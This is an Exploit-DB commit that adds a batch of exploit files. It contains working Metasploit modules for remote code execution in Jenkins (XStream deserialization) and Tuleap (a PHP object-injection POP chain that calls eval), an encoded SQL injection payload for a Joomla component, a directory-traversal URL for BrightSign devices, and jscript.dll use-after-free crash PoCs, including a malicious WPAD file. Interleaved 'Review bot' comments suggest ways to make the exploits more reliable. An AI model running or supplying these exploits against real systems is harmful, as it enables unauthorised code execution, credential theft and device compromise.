DB: 2017-12-20

12 changes to exploits/shellcodes

Microsoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free
Microsoft Internet Explorer 11 - 'jscript!JSONStringifyObject' Use-After-Free
Microsoft Windows - 'jscript!RegExpComp::Compile' Heap Overflow Through IE or Local Network via WPAD
Microsoft Windows - jscript.dll 'Array.sort' Heap Overflow
Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable
Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read
Intel Content Protection HECI Service - Type Confusion Privilege Escalation

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)
Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)
Jenkins - XStream Groovy classpath Deserialization (Metasploit)
BrightSign Digital Signage - Multiple Vulnerabilities
Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection
This commit is contained in:
Offensive Security 2017-12-20 05:02:22 +00:00
parent f76fbb1072
commit f93f05e46f
13 changed files with 1353 additions and 0 deletions


@ -0,0 +1,40 @@
# Exploit Title: BrightSign Digital Signage (Multiple Vulnerabilities)
# Date: 12/15/17
# Exploit Author: singularitysec@gmail.com
# Vectors: XSS, Directory Traversal, File Modification, Information Leakage
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below)
suffers from multiple vulnerabilities.
The pages:
/network_diagnostics.html
/storage_info.html
Suffer from a Cross-Site Scripting vulnerability. The REF parameter for
these pages do not sanitize user input, resulting in arbitrary execution,
token theft and related attacks.
The RP parameter in STORAGE.HTML suffers from a directory
traversal/information leakage weakness:
/storage.html?rp=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc
Through parameter manipulation, the file system can be traversed,
unauthenticated, allowing for leakage of information and compromise of the
device.
This page also allows for unauthenticated upload of files.
/tools.html
Page allows for unauthenticated rename/manipulation of files.
When combined, these vulnerabilities allow for compromise of both end users
and the device itself.
Ex. A malicious attacker can upload a malicious page of their choosing and
steal credentials, host malicious content or distribute content through the
device, which accepts large format SD cards.
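Review bot: the advisory header gives no fix status or vendor-contact information. It states "Firmware 6.2.63 and below" but never says whether a patched release exists or whether the vendor was notified, which is what a reader needs to judge exposure; add a `# Vendor Homepage:` and a `# Fixed in:` (or "no fix available") line next to the existing `# Date:` and `# Vectors:` headers. In the XSS paragraph, "The REF parameter for these pages do not sanitize user input" should read "does not sanitize", and "arbitrary execution" should be qualified as arbitrary script execution in the victim's browser, since the vector listed is Cross-Site Scripting rather than code execution on the device; the device-level impact comes from the unauthenticated traversal/upload/rename on `storage.html` and `tools.html`, which the text describes separately.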

exploits/multiple/remote/43375.rb (141 lines, executable file)

@ -0,0 +1,141 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins XStream Groovy classpath Deserialization Vulnerability',
'Description' => %q{
This module exploits CVE-2016-0792 a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions
older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath,
which allows remote arbitrary code execution. The issue affects default installations. Authentication
is not required to exploit the vulnerability.
},
'Author' =>
[
'Arshan Dabirsiaghi', # Vulnerability discovery
'Matt Byrne <attackdebris[at]gmail.com>' # Metasploit module
],
'DisclosureDate' => 'Feb 24 2016',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-0792'],
['URL', 'https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'],
['URL', 'https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413']
],
'Platform' => %w{ win linux unix },
'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],
'Targets' => [
['Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD
],
['Python (In-Memory)',
'Platform' => 'python',
'Arch' => ARCH_PYTHON
],
['Linux (Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64]
],
['Windows (Dropper)',
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
Opt::RPORT('8080')
])
deregister_options('URIPATH')
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
unless res
fail_with(Failure::Unknown, 'The connection timed out.')
end
http_headers = res.headers
if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f < 1.650
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
case target.name
when /Unix/, /Python/
execute_command(payload.encoded)
else
execute_cmdstager
end
end
# Exploit methods
def execute_command(cmd, opts = {})
cmd = case target.name
when /Unix/, /Linux/
%W{/bin/sh -c #{cmd}}
when /Python/
%W{python -c #{cmd}}
when /Windows/
%W{cmd.exe /c #{cmd}}
end
# Encode each command argument with XML entities
cmd.map! { |arg| arg.encode(xml: :text) }
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/createItem'),
'vars_get' => { 'name' => 'random' },
'ctype' => 'application/xml',
'data' => xstream_payload(cmd)
)
end
def xstream_payload(cmd)
<<EOF
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando"/>
<owner class="java.lang.ProcessBuilder">
<command>
<string>#{cmd.join('</string><string>')}</string>
</command>
</owner>
<method>start</method>
</org.codehaus.groovy.runtime.MethodClosure>
</entry>
</expandoProperties>
</groovy.util.Expando>
<int>1</int>
</entry>
</map>
EOF
end
end
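Review bot: the version test in `check` is lossy. `http_headers['X-Jenkins'].to_f < 1.650` truncates a three-component version such as `1.642.2` to `1.642`, so the patched LTS release 1.642.2, which the module's own description says is not affected, is reported as `Appears`, and any `2.x` header is silently compared as a float. Compare with `Gem::Version.new(http_headers['X-Jenkins'])` against the two thresholds the description names (`< 1.650` for the weekly line, `< 1.642.2` for LTS) and return `Safe` otherwise. Second, in `execute_command` the result of `send_request_cgi` is assigned to `res` and never inspected; check at least that a response came back and that it is not an HTTP 4xx/5xx so a failed trigger surfaces through `fail_with` instead of leaving the operator with a silent non-session. Minor: `'vars_get' => { 'name' => 'random' }` uses a fixed item name; `rand_text_alpha` is the usual choice so repeated runs do not collide.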

exploits/php/remote/43374.rb (184 lines, executable file)

@ -0,0 +1,184 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Tuleap 9.6 Second-Order PHP Object Injection',
'Description' => %q{
This module exploits a Second-Order PHP Object Injection vulnerability in Tuleap <= 9.6 which
could be abused by authenticated users to execute arbitrary PHP code with the permissions of the
webserver. The vulnerability exists because of the User::getRecentElements() method is using the
unserialize() function with data that can be arbitrarily manipulated by a user through the REST
API interface. The exploit's POP chain abuses the __toString() method from the Mustache class
to reach a call to eval() in the Transition_PostActionSubFactory::fetchPostActions() method.
},
'Author' => 'EgiX',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://karmainsecurity.com/KIS-2017-02'],
['URL', 'https://tuleap.net/plugins/tracker/?aid=10118'],
['CVE', '2017-7411']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Tuleap <= 9.6', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 23 2017'
))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
OptString.new('PASSWORD', [true, "The password to authenticate with" ]),
OptInt.new('AID', [ false, "The Artifact ID you have access to", "1"]),
Opt::RPORT(443)
])
end
def setup_popchain(random_param)
print_status("Trying to login through the REST API...")
user = datastore['USERNAME']
pass = datastore['PASSWORD']
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api/tokens'),
'ctype' => 'application/json',
'data' => {'username' => user, 'password' => pass}.to_json
})
unless res && (res.code == 201 || res.code == 200) && res.body
msg = "Login failed with #{user}:#{pass}"
print_error(msg) if @is_check
fail_with(Failure::NoAccess, msg)
end
body = JSON.parse(res.body)
uid = body['user_id']
token = body['token']
print_good("Login successful with #{user}:#{pass}")
print_status("Updating user preference with POP chain string...")
php_code = "null;eval(base64_decode($_POST['#{random_param}']));//"
pop_chain = 'a:1:{i:0;a:1:{'
pop_chain << 's:2:"id";O:8:"Mustache":2:{'
pop_chain << 'S:12:"\00*\00_template";'
pop_chain << 's:42:"{{#fetchPostActions}}{{/fetchPostActions}}";'
pop_chain << 'S:11:"\00*\00_context";a:1:{'
pop_chain << 'i:0;O:34:"Transition_PostAction_FieldFactory":1:{'
pop_chain << 'S:23:"\00*\00post_actions_classes";a:1:{'
pop_chain << "i:0;s:#{php_code.length}:\"#{php_code}\";}}}}}}"
pref = {'id' => uid, 'preference' => {'key' => 'recent_elements', 'value' => pop_chain}}
res = send_request_cgi({
'method' => 'PATCH',
'uri' => normalize_uri(target_uri.path, "api/users/#{uid}/preferences"),
'ctype' => 'application/json',
'headers' => {'X-Auth-Token' => token, 'X-Auth-UserId' => uid},
'data' => pref.to_json
})
unless res && res.code == 200
msg = "Something went wrong"
print_error(msg) if @is_check
fail_with(Failure::UnexpectedReply, msg)
end
end
def do_login
print_status("Retrieving the CSRF token for login...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'account/login.php')
})
if res && res.code == 200 && res.body && res.get_cookies
if res.body =~ /name="challenge" value="(\w+)">/
csrf_token = $1
print_good("CSRF token: #{csrf_token}")
else
print_warning("CSRF token not found. Trying to login without it...")
end
else
msg = "Failed to retrieve the login page"
print_error(msg) if @is_check
fail_with(Failure::NoAccess, msg)
end
user = datastore['USERNAME']
pass = datastore['PASSWORD']
res = send_request_cgi({
'method' => 'POST',
'cookie' => res.get_cookies,
'uri' => normalize_uri(target_uri.path, 'account/login.php'),
'vars_post' => {'form_loginname' => user, 'form_pw' => pass, 'challenge' => csrf_token}
})
unless res && res.code == 302
msg = "Login failed with #{user}:#{pass}"
print_error(msg) if @is_check
fail_with(Failure::NoAccess, msg)
end
print_good("Login successful with #{user}:#{pass}")
res.get_cookies
end
def exec_php(php_code)
random_param = rand_text_alpha(10)
setup_popchain(random_param)
session_cookies = do_login()
print_status("Triggering the POP chain...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "plugins/tracker/?aid=#{datastore['AID']}"),
'cookie' => session_cookies,
'vars_post' => {random_param => Rex::Text.encode_base64(php_code)}
})
if res && res.code == 200 && res.body =~ /Exiting with Error/
msg = "No access to Artifact ID #{datastore['AID']}"
@is_check ? print_error(msg) : fail_with(Failure::NoAccess, msg)
end
res
end
def check
@is_check = true
flag = rand_text_alpha(rand(10)+20)
res = exec_php("print '#{flag}';")
if res && res.code == 200 && res.body =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
elsif res && res.body =~ /Exiting with Error/
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def exploit
@is_check = false
exec_php(payload.encoded)
end
end
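Review bot: `check` cannot return a CheckCode when authentication or the preference update fails. In `setup_popchain` and `do_login` the pattern `print_error(msg) if @is_check` is immediately followed by an unconditional `fail_with(...)`, which raises out of `check` instead of returning `Exploit::CheckCode::Unknown`; only `exec_php` uses the conditional form `@is_check ? print_error(msg) : fail_with(Failure::NoAccess, msg)`. Make the three sites consistent (return `nil` from the helper when `@is_check` is set and let `check` map that to `Unknown`). Second, the PATCH to `api/users/#{uid}/preferences` writes the POP chain into the user's persistent `recent_elements` preference and nothing restores it, so every run, `check` included, leaves the serialized chain in the database where it is unserialized again on later page loads; read the previous value before overwriting it and restore it in a `cleanup` method. Minor: `OptInt.new('AID', [ false, "The Artifact ID you have access to", "1"])` passes a String default to an integer option; use `1`.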


@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection
# Dork: N/A
# Date: 19.12.2017
# Vendor Homepage: hhttp://nextgeneditor.com/
# Software Link: https://extensions.joomla.org/extension/nextgen-editor/
# Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free
# Version: 2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL]
#
# %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d
#
# # # # #
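Review bot: the `# Vendor Homepage:` line has a typo, `hhttp://nextgeneditor.com/`, which should be `http://nextgeneditor.com/`. The `# Description:` line ("The vulnerability allows an attacker to inject sql commands....") does not name the injection point even though the request line below does (`plname` in `index.php?option=com_nge&view=config`); state the parameter and view in the description, note that the request is unauthenticated or authenticated as applicable, and, since `# CVE: N/A`, record whether the vendor was notified and whether a fixed release exists so readers can determine patch state.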


@ -0,0 +1,186 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1376
There is a use-after-free vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
- The issue can also be exploited by opening a malicious web page in Internet Explorer.
The issue has been verified on 64-bit Win7 with the most recent patches applied.
PoC for Internet Explorer (might require page heap to trigger the crash):
============================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};
function f() {
vars[1] = 1;
CollectGarbage();
return {};
}
vars[1].toString = f;
Array.prototype.join.call(vars);
</script>
<!--
============================================
PoC for WPAD (might require page heap to trigger the crash):
============================================
function FindProxyForURL(url, host) {
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};
function f() {
vars[1] = 1;
CollectGarbage();
return {};
}
vars[1].toString = f;
Array.prototype.join.call(vars);
return "DIRECT";
}
===========================================
Technical details:
The issue is in NameTbl::GetValDef which is called when an object is converted to a string. The function attempts to call toString() or valueOf() of the NameTbl object 2 times or until the return value isn't an JavaScript object. The issue is that the NameTbl object on which these methods are called isn't explicitly tracked by the garbage collector, which means the object can be deleted inside the toString/valueOf callback (as long as it's not tracked by the garbage collector somewhere else). Basically, toString/valueOf can delete its 'this' object.
Note that the crash location in the Debug log immediately precedes a virtual method call.
Debug log (from IE, but it looks similar in the WPAD service):
============================================
(a68.e4c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
0:013> r
rax=0000000000000001 rbx=000007fef5d7bd50 rcx=00000000044acfa0
rdx=0000000000000000 rsi=0000000012b49fb8 rdi=0000000000000001
rip=000007fef5dea398 rsp=0000000012b49ae0 rbp=0000000000000000
r8=0000000004309f20 r9=0000000004309670 r10=0000000000000081
r11=0000000012b49a60 r12=0000000000000080 r13=0000000000000008
r14=00000000044d9f90 r15=0000000000000000
iopl=0 nv up ei ng nz ac po cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 00000000`12b49ae0 000007fe`f5dad069 jscript!NameTbl::GetValDef+0x58
01 00000000`12b49b70 000007fe`f5d7de69 jscript!NameTbl::InvokeInternal+0xb07
02 00000000`12b49c90 000007fe`f5d7bf3b jscript!VAR::GetValue+0xa1
03 00000000`12b49ce0 000007fe`f5ddb65d jscript!ConvertToString+0x5b
04 00000000`12b49f60 000007fe`f5d7c2ec jscript!JsArrayJoin+0x38d
05 00000000`12b4a060 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
06 00000000`12b4a110 000007fe`f5d786ea jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`12b4a230 000007fe`f5dcdd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
08 00000000`12b4a280 000007fe`f5d7c2ec jscript!JsFncCall+0xc2
09 00000000`12b4a310 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
0a 00000000`12b4a3c0 000007fe`f5d7b234 jscript!NameTbl::InvokeInternal+0x3f8
0b 00000000`12b4a4e0 000007fe`f5d79852 jscript!VAR::InvokeByName+0x81c
0c 00000000`12b4a6f0 000007fe`f5d79929 jscript!VAR::InvokeDispName+0x72
0d 00000000`12b4a770 000007fe`f5d724b8 jscript!VAR::InvokeByDispID+0x1229
0e 00000000`12b4a7c0 000007fe`f5d78ec2 jscript!CScriptRuntime::Run+0x5a6
0f 00000000`12b4b5c0 000007fe`f5d78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
10 00000000`12b4b7d0 000007fe`f5d78b95 jscript!ScrFncObj::Call+0xb7
11 00000000`12b4b870 000007fe`f5d7e6c0 jscript!CSession::Execute+0x19e
12 00000000`12b4b940 000007fe`f5d870e7 jscript!COleScript::ExecutePendingScripts+0x17a
13 00000000`12b4ba10 000007fe`f5d868d6 jscript!COleScript::ParseScriptTextCore+0x267
14 00000000`12b4bb00 000007fe`ead55251 jscript!COleScript::ParseScriptText+0x56
15 00000000`12b4bb60 000007fe`eb4db320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
16 00000000`12b4bbe0 000007fe`ead56256 MSHTML!CScriptCollection::ParseScriptText+0x37f
17 00000000`12b4bcc0 000007fe`ead55c8e MSHTML!CScriptData::CommitCode+0x3d9
18 00000000`12b4be90 000007fe`ead55a11 MSHTML!CScriptData::Execute+0x283
19 00000000`12b4bf50 000007fe`eb5146fb MSHTML!CHtmScriptParseCtx::Execute+0x101
1a 00000000`12b4bf90 000007fe`eadf8a5b MSHTML!CHtmParseBase::Execute+0x235
1b 00000000`12b4c030 000007fe`eacd2e39 MSHTML!CHtmPost::Broadcast+0x90
1c 00000000`12b4c070 000007fe`ead2caef MSHTML!CHtmPost::Exec+0x4bb
1d 00000000`12b4c280 000007fe`ead2ca40 MSHTML!CHtmPost::Run+0x3f
1e 00000000`12b4c2b0 000007fe`ead2da12 MSHTML!PostManExecute+0x70
1f 00000000`12b4c330 000007fe`ead30843 MSHTML!PostManResume+0xa1
20 00000000`12b4c370 000007fe`ead16fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
21 00000000`12b4c3c0 000007fe`eb544f78 MSHTML!CDwnChan::OnMethodCall+0x41
22 00000000`12b4c3f0 000007fe`eac39d75 MSHTML!GlobalWndOnMethodCall+0x240
23 00000000`12b4c490 00000000`77709bbd MSHTML!GlobalWndProc+0x150
24 00000000`12b4c510 00000000`777098c2 USER32!UserCallWinProcCheckWow+0x1ad
25 00000000`12b4c5d0 000007fe`f2be4a87 USER32!DispatchMessageWorker+0x3b5
26 00000000`12b4c650 000007fe`f2bebabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
27 00000000`12b4f8d0 000007fe`fe88572f IEFRAME!LCIETab_ThreadProc+0x3a3
28 00000000`12b4fa00 000007fe`f5ff925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
29 00000000`12b4fa30 00000000`775e59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
2a 00000000`12b4fa80 00000000`7781a561 kernel32!BaseThreadInitThunk+0xd
2b 00000000`12b4fab0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
0:013> !heap -p -a 00000000`044d9f90
address 00000000044d9f90 found in
_DPH_HEAP_ROOT @ 3fd1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
3fe0680: 44d9000 2000
000007fef5f78726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
00000000778b4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
000000007785797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
000007feff2110c8 msvcrt!free+0x000000000000001c
000007fef5d7bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
000007fef5d7b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
000007fef5d942cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
000007fef5d719e2 jscript!GcContext::Reclaim+0x00000000000000ae
000007fef5d81956 jscript!GcContext::CollectCore+0x000000000000018b
000007fef5d817a5 jscript!GcContext::Collect+0x0000000000000025
000007fef5dc42f3 jscript!JsCollectGarbage+0x0000000000000023
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5d724b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007fef5d78ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
000007fef5d78d2b jscript!ScrFncObj::Call+0x00000000000000b7
000007fef5da2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5dea422 jscript!NameTbl::GetValDef+0x00000000000000e2
000007fef5dad069 jscript!NameTbl::InvokeInternal+0x0000000000000b07
000007fef5d7de69 jscript!VAR::GetValue+0x00000000000000a1
000007fef5d7bf3b jscript!ConvertToString+0x000000000000005b
000007fef5ddb65d jscript!JsArrayJoin+0x000000000000038d
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5dcdd72 jscript!JsFncCall+0x00000000000000c2
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007fef5d7b234 jscript!VAR::InvokeByName+0x000000000000081c
000007fef5d79852 jscript!VAR::InvokeDispName+0x0000000000000072
0:013> u rip
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14]
000007fe`f5dea39b 488b98e0000000 mov rbx,qword ptr [rax+0E0h]
000007fe`f5dea3a2 488bcb mov rcx,rbx
000007fe`f5dea3a5 ff15b5320400 call qword ptr [jscript!_guard_check_icall_fptr (000007fe`f5e2d660)]
000007fe`f5dea3ab 488b54fc40 mov rdx,qword ptr [rsp+rdi*8+40h]
000007fe`f5dea3b0 4c8d442450 lea r8,[rsp+50h]
000007fe`f5dea3b5 498bce mov rcx,r14
000007fe`f5dea3b8 ffd3 call rbx
============================================
-->
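Review bot: the header comment never links the bug to a vendor fix or identifier; the commit title names `jscript!NameTbl::GetValDef`, but the file only carries the Project Zero tracker URL and says "most recent patches applied" without naming a build. Add the MSRC advisory and CVE once assigned so readers can verify patch state, and consider a short mitigation line for the WPAD vector the text describes (the WinHTTP Web Proxy Auto-Discovery Service can be disabled, and automatic proxy detection turned off, on hosts that do not need it). Two smaller points: `<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>` puts a closing tag on a void element, write it as `<meta ... />` as in valid HTML; and in "Technical details", "2 times or until the return value isn't an JavaScript object" should read "twice, or until the return value is not a JavaScript object".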


@ -0,0 +1,140 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1381
There is a use-after-free in jscript.dll library that can be exploited in IE11.
PoC:
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var o1 = {toJSON:function(){
alert('o1');
return [o2];
}}
var o2 = {toJSON:function(){
alert('o2');
CollectGarbage();
return 'x';
}}
JSON.stringify(o1);
</script>
<!--
=========================================
Technical details:
JSONStringifyObject first calls JSONApplyFilters which calls an argument's toString method. However the return value of the toString method won't be on the garbage collector's root object list and thus can be freed during subsequent callbacks.
Debug log:
=========================================
0:028> g
(df8.e48): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!JSONStringifyArray+0x38f:
000007fe`edbf9fb3 66214738 and word ptr [rdi+38h],ax ds:00000000`04518fc8=????
0:014> r
rax=000000000000fffb rbx=0000000000000000 rcx=0000000000000005
rdx=0000000000000005 rsi=00000000129ca100 rdi=0000000004518f90
rip=000007feedbf9fb3 rsp=00000000129c9f30 rbp=00000000129c9fa9
r8=0000000000000000 r9=000000000405d670 r10=0000000000000081
r11=00000000129c9f00 r12=0000000000000001 r13=0000000000000001
r14=0000000000000000 r15=00000000129ca1a8
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
jscript!JSONStringifyArray+0x38f:
000007fe`edbf9fb3 66214738 and word ptr [rdi+38h],ax ds:00000000`04518fc8=????
0:014> k
# Child-SP RetAddr Call Site
00 00000000`129c9f30 000007fe`edbfa2cc jscript!JSONStringifyArray+0x38f
01 00000000`129ca000 000007fe`edbfec94 jscript!JSONStringifyObject+0x2dc
02 00000000`129ca0b0 000007fe`edb9c2ec jscript!JsJSONStringify+0x3e4
03 00000000`129ca190 000007fe`edb9a9fe jscript!NatFncObj::Call+0x138
04 00000000`129ca240 000007fe`edb9b234 jscript!NameTbl::InvokeInternal+0x3f8
05 00000000`129ca360 000007fe`edb99852 jscript!VAR::InvokeByName+0x81c
06 00000000`129ca570 000007fe`edb99929 jscript!VAR::InvokeDispName+0x72
07 00000000`129ca5f0 000007fe`edb924b8 jscript!VAR::InvokeByDispID+0x1229
08 00000000`129ca640 000007fe`edb98ec2 jscript!CScriptRuntime::Run+0x5a6
09 00000000`129cb440 000007fe`edb98d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
0a 00000000`129cb650 000007fe`edb98b95 jscript!ScrFncObj::Call+0xb7
0b 00000000`129cb6f0 000007fe`edb9e6c0 jscript!CSession::Execute+0x19e
0c 00000000`129cb7c0 000007fe`edba70e7 jscript!COleScript::ExecutePendingScripts+0x17a
0d 00000000`129cb890 000007fe`edba68d6 jscript!COleScript::ParseScriptTextCore+0x267
0e 00000000`129cb980 000007fe`ee2f5251 jscript!COleScript::ParseScriptText+0x56
0f 00000000`129cb9e0 000007fe`eea7b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
10 00000000`129cba60 000007fe`ee2f6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
11 00000000`129cbb40 000007fe`ee2f5c8e MSHTML!CScriptData::CommitCode+0x3d9
12 00000000`129cbd10 000007fe`ee2f5a11 MSHTML!CScriptData::Execute+0x283
13 00000000`129cbdd0 000007fe`eeab46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
14 00000000`129cbe10 000007fe`ee398a5b MSHTML!CHtmParseBase::Execute+0x235
15 00000000`129cbeb0 000007fe`ee272e39 MSHTML!CHtmPost::Broadcast+0x90
16 00000000`129cbef0 000007fe`ee2ccaef MSHTML!CHtmPost::Exec+0x4bb
17 00000000`129cc100 000007fe`ee2cca40 MSHTML!CHtmPost::Run+0x3f
18 00000000`129cc130 000007fe`ee2cda12 MSHTML!PostManExecute+0x70
19 00000000`129cc1b0 000007fe`ee2d0843 MSHTML!PostManResume+0xa1
1a 00000000`129cc1f0 000007fe`ee2b6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1b 00000000`129cc240 000007fe`eeae4f78 MSHTML!CDwnChan::OnMethodCall+0x41
1c 00000000`129cc270 000007fe`ee1d9d75 MSHTML!GlobalWndOnMethodCall+0x240
1d 00000000`129cc310 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1e 00000000`129cc390 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1f 00000000`129cc450 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
20 00000000`129cc4d0 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
21 00000000`129cf750 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
22 00000000`129cf880 000007fe`efb2925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
23 00000000`129cf8b0 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
24 00000000`129cf900 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
25 00000000`129cf930 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
0:014> !heap -p -a 00000000`04518fc8
address 0000000004518fc8 found in
_DPH_HEAP_ROOT @ 3d31000
